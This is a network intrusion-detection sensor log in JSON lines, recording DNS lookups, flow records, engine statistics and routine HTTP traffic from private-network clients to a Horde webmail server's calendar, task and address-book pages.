{"timestamp":"2020-02-29T00:16:13.650442+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29509,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:16:14.000386+0000","flow_id":480231771154811,"event_type":"flow","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:13.403835+0000","end":"2020-02-29T00:11:13.512776+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:15.000325+0000","event_type":"stats","stats":{"uptime":14627,"capture":{"kernel_packets":136059,"kernel_drops":0},"decoder":{"pkts":136062,"bytes":93601295,"invalid":188,"ipv4":134547,"ipv6":8,"ethernet":136062,"raw":0,"null":0,"sll":0,"tcp":129174,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2775,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22810,"memcap_state":0,"memcap_global":0},"http":{"memuse":39762,"memcap":0}}} {"timestamp":"2020-02-29T00:16:15.001120+0000","flow_id":422730764433898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:15:08.702954+0000","end":"2020-02-29T00:15:14.111373+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:17.582541+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3528,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":6,"tx_id":0}} {"timestamp":"2020-02-29T00:16:18.794784+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34850,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:16:19.000874+0000","flow_id":1941895041657687,"event_type":"flow","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:18.863063+0000","end":"2020-02-29T00:11:18.971428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.000316+0000","flow_id":316799676049850,"event_type":"flow","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:19.256442+0000","end":"2020-02-29T00:11:19.364994+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.105331+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52826,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":923,"tx_id":0}} {"timestamp":"2020-02-29T00:16:22.000202+0000","event_type":"stats","stats":{"uptime":14634,"capture":{"kernel_packets":136088,"kernel_drops":0},"decoder":{"pkts":136097,"bytes":93608368,"invalid":188,"ipv4":134582,"ipv6":8,"ethernet":136097,"raw":0,"null":0,"sll":0,"tcp":129203,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2412,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22811,"memcap_state":0,"memcap_global":0},"http":{"memuse":78873,"memcap":0}}} {"timestamp":"2020-02-29T00:16:22.722948+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":17,"tx_id":0}} {"timestamp":"2020-02-29T00:16:23.000656+0000","flow_id":909784335920538,"event_type":"flow","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:22.863642+0000","end":"2020-02-29T00:11:22.975027+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:25.337206+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34852,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":434,"tx_id":0}} {"timestamp":"2020-02-29T00:16:27.000653+0000","flow_id":788838057176103,"event_type":"flow","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:26.519207+0000","end":"2020-02-29T00:11:26.627443+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:28.391364+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:28.663260+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989}} {"timestamp":"2020-02-29T00:16:29.000167+0000","event_type":"stats","stats":{"uptime":14641,"capture":{"kernel_packets":136099,"kernel_drops":0},"decoder":{"pkts":136107,"bytes":93608932,"invalid":188,"ipv4":134588,"ipv6":8,"ethernet":136107,"raw":0,"null":0,"sll":0,"tcp":129209,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2413,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":86471,"memcap":0}}} {"timestamp":"2020-02-29T00:16:32.000456+0000","flow_id":480248952220453,"event_type":"flow","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:31.748325+0000","end":"2020-02-29T00:11:31.856514+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:32.015430+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13482,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.186700+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565}} {"timestamp":"2020-02-29T00:16:32.229983+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37034,"tx_id":0}} {"timestamp":"2020-02-29T00:16:32.237663+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33890,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.397865+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982}} {"timestamp":"2020-02-29T00:16:33.000734+0000","flow_id":1221616157382490,"event_type":"flow","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1826,"bytes_toclient":18270,"start":"2020-02-29T00:15:24.907098+0000","end":"2020-02-29T00:15:32.654799+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:35.000336+0000","flow_id":16980894975856,"event_type":"flow","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:34.034672+0000","end":"2020-02-29T00:11:34.142465+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:36.000252+0000","event_type":"stats","stats":{"uptime":14648,"capture":{"kernel_packets":136127,"kernel_drops":0},"decoder":{"pkts":136159,"bytes":93634934,"invalid":188,"ipv4":134640,"ipv6":8,"ethernet":136159,"raw":0,"null":0,"sll":0,"tcp":129255,"udp":5182,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2797,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2813,"synack":2804,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1836,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2370,"failed_udp":112},"tx":{"http":4701,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2450}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2415,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":138193,"memcap":0}}} {"timestamp":"2020-02-29T00:16:37.000848+0000","flow_id":1911890401320261,"event_type":"flow","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:36.023877+0000","end":"2020-02-29T00:11:36.132194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:37.187349+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34856,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34651,"tx_id":0}} 